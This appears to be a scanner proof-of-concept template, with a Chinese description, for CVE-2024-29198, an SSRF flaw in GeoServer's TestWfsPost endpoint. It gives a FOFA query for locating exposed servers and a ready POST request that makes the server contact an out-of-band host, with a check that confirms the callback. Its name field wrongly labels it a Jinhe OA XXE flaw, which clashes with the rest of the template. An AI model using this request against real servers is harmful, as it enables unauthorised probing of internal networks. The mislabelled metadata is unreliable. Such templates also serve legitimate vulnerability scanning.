漏洞描述
GeoServer是一个功能齐全,遵循OGC开放标准的开源WFS-T和WMS服务器。CVE-2024-29198 中,攻击者可构造恶意请求,利用SSRF扫描内网,获取相关敏感信息。GeoServer TestWFSpost 存在SSRF漏洞。
fofa:app="GeoServer"
id: CVE-2024-29198
info:
name: 金和OA-C6系统ActionDataSet接口XXE漏洞
author: avic123
severity: critical
verified: true
description: |
GeoServer是一个功能齐全,遵循OGC开放标准的开源WFS-T和WMS服务器。CVE-2024-29198 中,攻击者可构造恶意请求,利用SSRF扫描内网,获取相关敏感信息。GeoServer TestWFSpost 存在SSRF漏洞。
fofa:app="GeoServer"
reference:
- https://mp.weixin.qq.com/s/mISdNludjfd7vZfMPDcGSQ
tags: cve,cve-2024-29198,SSRF
created: 2025/8/22
set:
oob: oob()
oobHTTP: oob.HTTP
oobDNS: oob.DNS
hostname: request.url.host
rules:
r0:
request:
method: POST
path: /geoserver/TestWfsPost
headers:
Content-Type: application/x-www-form-urlencoded
body: |
url={{oobHTTP}}&body=123
expression: response.status == 200 && oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()